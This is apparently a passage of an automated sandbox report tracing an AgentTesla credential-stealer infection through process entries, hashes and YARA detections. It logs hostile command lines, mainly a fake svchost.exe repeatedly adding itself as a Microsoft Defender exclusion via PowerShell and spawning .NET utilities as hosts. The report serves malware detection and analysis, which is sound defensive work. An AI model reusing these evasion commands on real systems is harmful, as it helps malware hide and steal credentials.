                                                                                                                                                                                                                                                  Start date:26/04/2024
                                                                                                                                                                                                                                                  Path:C:\Users\user\AppData\Roaming\svchost.exe
                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                  Commandline:"C:\Users\user\AppData\Roaming\svchost.exe"
                                                                                                                                                                                                                                                  Imagebase:0x1fc8d3b0000
                                                                                                                                                                                                                                                  File size:912'780 bytes
                                                                                                                                                                                                                                                  MD5 hash:D797AAE1EAF481E9C887482192B84109
                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                                                                  • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000011.00000002.1454297088.000001FC8F1F1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000011.00000002.1465404864.000001FC9F1C1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000011.00000002.1465404864.000001FC9F1C1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                  Target ID:18
                                                                                                                                                                                                                                                  Start time:10:07:06
                                                                                                                                                                                                                                                  Start date:26/04/2024
                                                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                  Imagebase:0x7ff620390000
                                                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                  Target ID:19
                                                                                                                                                                                                                                                  Start time:10:07:07
                                                                                                                                                                                                                                                  Start date:26/04/2024
                                                                                                                                                                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\svchost.exe" -Force
                                                                                                                                                                                                                                                  Imagebase:0x7ff7b2bb0000
                                                                                                                                                                                                                                                  File size:452'608 bytes
                                                                                                                                                                                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                  Target ID:20
                                                                                                                                                                                                                                                  Start time:10:07:07
                                                                                                                                                                                                                                                  Start date:26/04/2024
                                                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                  Imagebase:0x7ff620390000
                                                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                  Target ID:21
                                                                                                                                                                                                                                                  Start time:10:07:07
                                                                                                                                                                                                                                                  Start date:26/04/2024
                                                                                                                                                                                                                                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                                  Wow64 process (32bit):
                                                                                                                                                                                                                                                  Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe"
                                                                                                                                                                                                                                                  Imagebase:
                                                                                                                                                                                                                                                  File size:42'064 bytes
                                                                                                                                                                                                                                                  MD5 hash:5D4073B2EB6D217C19F2B22F21BF8D57
                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                  Target ID:22
                                                                                                                                                                                                                                                  Start time:10:07:08
                                                                                                                                                                                                                                                  Start date:26/04/2024
                                                                                                                                                                                                                                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                  Wow64 process (32bit):
                                                                                                                                                                                                                                                  Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"
                                                                                                                                                                                                                                                  Imagebase:
                                                                                                                                                                                                                                                  File size:65'440 bytes
                                                                                                                                                                                                                                                  MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                  Target ID:23
                                                                                                                                                                                                                                                  Start time:10:07:08
                                                                                                                                                                                                                                                  Start date:26/04/2024
                                                                                                                                                                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\svchost.exe" -Force
                                                                                                                                                                                                                                                  Imagebase:0x7ff7b2bb0000
                                                                                                                                                                                                                                                  File size:452'608 bytes
                                                                                                                                                                                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                  Target ID:24
                                                                                                                                                                                                                                                  Start time:10:07:08
                                                                                                                                                                                                                                                  Start date:26/04/2024
                                                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                  Imagebase:0x7ff620390000
                                                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                  Target ID:25
                                                                                                                                                                                                                                                  Start time:10:07:08
                                                                                                                                                                                                                                                  Start date:26/04/2024
                                                                                                                                                                                                                                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                                                                                                                                  Wow64 process (32bit):
                                                                                                                                                                                                                                                  Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"
                                                                                                                                                                                                                                                  Imagebase:
                                                                                                                                                                                                                                                  File size:45'984 bytes
                                                                                                                                                                                                                                                  MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                  Target ID:26
                                                                                                                                                                                                                                                  Start time:10:07:09
                                                                                                                                                                                                                                                  Start date:26/04/2024
                                                                                                                                                                                                                                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                                  Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                                                                                                                                                                                                                                                  Imagebase:0x890000
                                                                                                                                                                                                                                                  File size:43'008 bytes
                                                                                                                                                                                                                                                  MD5 hash:9827FF3CDF4B83F9C86354606736CA9C
                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000001A.00000002.1487009646.0000000002BFE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001A.00000002.1472724735.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000001A.00000002.1472724735.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000001A.00000002.1487009646.0000000002C2C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001A.00000002.1487009646.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000001A.00000002.1487009646.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                  Target ID:27
                                                                                                                                                                                                                                                  Start time:10:07:09
                                                                                                                                                                                                                                                  Start date:26/04/2024
                                                                                                                                                                                                                                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                  Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                                                                                                                                                                                                                                                  Imagebase:0x210000
                                                                                                                                                                                                                                                  File size:43'008 bytes
                                                                                                                                                                                                                                                  MD5 hash:9827FF3CDF4B83F9C86354606736CA9C
                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                  Target ID:28
                                                                                                                                                                                                                                                  Start time:10:07:09
                                                                                                                                                                                                                                                  Start date:26/04/2024
                                                                                                                                                                                                                                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                                  Wow64 process (32bit):
                                                                                                                                                                                                                                                  Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe"
                                                                                                                                                                                                                                                  Imagebase:
                                                                                                                                                                                                                                                  File size:42'064 bytes
                                                                                                                                                                                                                                                  MD5 hash:5D4073B2EB6D217C19F2B22F21BF8D57
                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                  Target ID:29
                                                                                                                                                                                                                                                  Start time:10:07:09
                                                                                                                                                                                                                                                  Start date:26/04/2024
                                                                                                                                                                                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                  Commandline:C:\Windows\System32\svchost.exe -k WerSvcGroup
                                                                                                                                                                                                                                                  Imagebase:0x7ff7df220000
                                                                                                                                                                                                                                                  File size:55'320 bytes
                                                                                                                                                                                                                                                  MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                  Target ID:30
                                                                                                                                                                                                                                                  Start time:10:07:09
                                                                                                                                                                                                                                                  Start date:26/04/2024
                                                                                                                                                                                                                                                  Path:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\WerFault.exe -pss -s 428 -p 8072 -ip 8072
                                                                                                                                                                                                                                                  Imagebase:0x7ff611ba0000
                                                                                                                                                                                                                                                  File size:570'736 bytes
                                                                                                                                                                                                                                                  MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                  Target ID:31
                                                                                                                                                                                                                                                  Start time:10:07:09
                                                                                                                                                                                                                                                  Start date:26/04/2024
                                                                                                                                                                                                                                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                                  Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
                                                                                                                                                                                                                                                  Imagebase:0x640000
                                                                                                                                                                                                                                                  File size:108'664 bytes
                                                                                                                                                                                                                                                  MD5 hash:914F728C04D3EDDD5FBA59420E74E56B
                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000001F.00000002.1627243849.0000000002D9F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001F.00000002.1627243849.0000000002D44000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000001F.00000002.1627243849.0000000002D44000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000001F.00000002.1627243849.0000000002D71000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                  Target ID:32
                                                                                                                                                                                                                                                  Start time:10:07:09
                                                                                                                                                                                                                                                  Start date:26/04/2024
                                                                                                                                                                                                                                                  Path:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\WerFault.exe -u -p 8072 -s 1276
                                                                                                                                                                                                                                                  Imagebase:0x7ff611ba0000
                                                                                                                                                                                                                                                  File size:570'736 bytes
                                                                                                                                                                                                                                                  MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                  Target ID:33
                                                                                                                                                                                                                                                  Start time:10:07:09
                                                                                                                                                                                                                                                  Start date:26/04/2024
                                                                                                                                                                                                                                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                  Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
                                                                                                                                                                                                                                                  Imagebase:0x4a0000
                                                                                                                                                                                                                                                  File size:108'664 bytes
                                                                                                                                                                                                                                                  MD5 hash:914F728C04D3EDDD5FBA59420E74E56B
                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                  Target ID:34
                                                                                                                                                                                                                                                  Start time:10:07:09
                                                                                                                                                                                                                                                  Start date:26/04/2024
                                                                                                                                                                                                                                                  Path:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\WerFault.exe -pss -s 212 -p 8164 -ip 8164
                                                                                                                                                                                                                                                  Imagebase:0x7ff611ba0000
                                                                                                                                                                                                                                                  File size:570'736 bytes
                                                                                                                                                                                                                                                  MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                  Target ID:35
                                                                                                                                                                                                                                                  Start time:10:07:09
                                                                                                                                                                                                                                                  Start date:26/04/2024
                                                                                                                                                                                                                                                  Path:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\WerFault.exe -u -p 8164 -s 1688
                                                                                                                                                                                                                                                  Imagebase:0x7ff611ba0000
                                                                                                                                                                                                                                                  File size:570'736 bytes
                                                                                                                                                                                                                                                  MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                  Target ID:36
                                                                                                                                                                                                                                                  Start time:10:07:11
                                                                                                                                                                                                                                                  Start date:26/04/2024
                                                                                                                                                                                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                                                                                                                                                                                                                                                  Imagebase:0x7ff7df220000
                                                                                                                                                                                                                                                  File size:55'320 bytes
                                                                                                                                                                                                                                                  MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                  Target ID:38
                                                                                                                                                                                                                                                  Start time:10:07:16
                                                                                                                                                                                                                                                  Start date:26/04/2024
                                                                                                                                                                                                                                                  Path:C:\Users\user\AppData\Roaming\svchost.exe
                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                  Commandline:"C:\Users\user\AppData\Roaming\svchost.exe"
                                                                                                                                                                                                                                                  Imagebase:0x26bb2dc0000
                                                                                                                                                                                                                                                  File size:912'780 bytes
                                                                                                                                                                                                                                                  MD5 hash:D797AAE1EAF481E9C887482192B84109
                                                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                                                                  • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000026.00000002.1488978955.0000026BB4FDE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                  Target ID:39
                                                                                                                                                                                                                                                  Start time:10:07:16
                                                                                                                                                                                                                                                  Start date:26/04/2024
                                                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                  Imagebase:0x7ff620390000
                                                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                  Target ID:41
                                                                                                                                                                                                                                                  Start time:10:07:20
                                                                                                                                                                                                                                                  Start date:26/04/2024
                                                                                                                                                                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\svchost.exe" -Force
                                                                                                                                                                                                                                                  Imagebase:0x7ff7b2bb0000
                                                                                                                                                                                                                                                  File size:452'608 bytes
                                                                                                                                                                                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                  Target ID:42
                                                                                                                                                                                                                                                  Start time:10:07:20
                                                                                                                                                                                                                                                  Start date:26/04/2024
                                                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                  Imagebase:0x7ff620390000
                                                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                  Target ID:43
                                                                                                                                                                                                                                                  Start time:10:07:20
                                                                                                                                                                                                                                                  Start date:26/04/2024
                                                                                                                                                                                                                                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                                  Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                                                                                                                                                                                                                                                  Imagebase:0xa70000
                                                                                                                                                                                                                                                  File size:43'008 bytes
                                                                                                                                                                                                                                                  MD5 hash:9827FF3CDF4B83F9C86354606736CA9C
                                                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000002B.00000002.2520439287.0000000002FAD000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000002B.00000002.2520439287.0000000002F52000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000002B.00000002.2520439287.0000000002F52000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000002B.00000002.2520439287.0000000002F7F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                  Target ID:44
                                                                                                                                                                                                                                                  Start time:10:07:20
                                                                                                                                                                                                                                                  Start date:26/04/2024
                                                                                                                                                                                                                                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                  Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                                                                                                                                                                                                                                                  Imagebase:0xa40000
                                                                                                                                                                                                                                                  File size:43'008 bytes
                                                                                                                                                                                                                                                  MD5 hash:9827FF3CDF4B83F9C86354606736CA9C
                                                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                  Target ID:45
                                                                                                                                                                                                                                                  Start time:10:07:20
                                                                                                                                                                                                                                                  Start date:26/04/2024
                                                                                                                                                                                                                                                  Path:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\WerFault.exe -pss -s 552 -p 7412 -ip 7412
                                                                                                                                                                                                                                                  Imagebase:0x7ff611ba0000
                                                                                                                                                                                                                                                  File size:570'736 bytes
                                                                                                                                                                                                                                                  MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                  Target ID:46
                                                                                                                                                                                                                                                  Start time:10:07:20
                                                                                                                                                                                                                                                  Start date:26/04/2024
                                                                                                                                                                                                                                                  Path:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\WerFault.exe -u -p 7412 -s 1648
                                                                                                                                                                                                                                                  Imagebase:0x7ff611ba0000
                                                                                                                                                                                                                                                  File size:570'736 bytes
                                                                                                                                                                                                                                                  MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                  Target ID:50
                                                                                                                                                                                                                                                  Start time:10:07:26
                                                                                                                                                                                                                                                  Start date:26/04/2024
                                                                                                                                                                                                                                                  Path:C:\Users\user\AppData\Roaming\avdfUcC\avdfUcC.exe
                                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                                  Commandline:"C:\Users\user\AppData\Roaming\avdfUcC\avdfUcC.exe"
                                                                                                                                                                                                                                                  Imagebase:0x7ff7df220000
                                                                                                                                                                                                                                                  File size:43'008 bytes
                                                                                                                                                                                                                                                  MD5 hash:9827FF3CDF4B83F9C86354606736CA9C
                                                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                  Antivirus matches:
                                                                                                                                                                                                                                                  • Detection: 0%, ReversingLabs
                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                  Target ID:51
                                                                                                                                                                                                                                                  Start time:10:07:26
                                                                                                                                                                                                                                                  Start date:26/04/2024
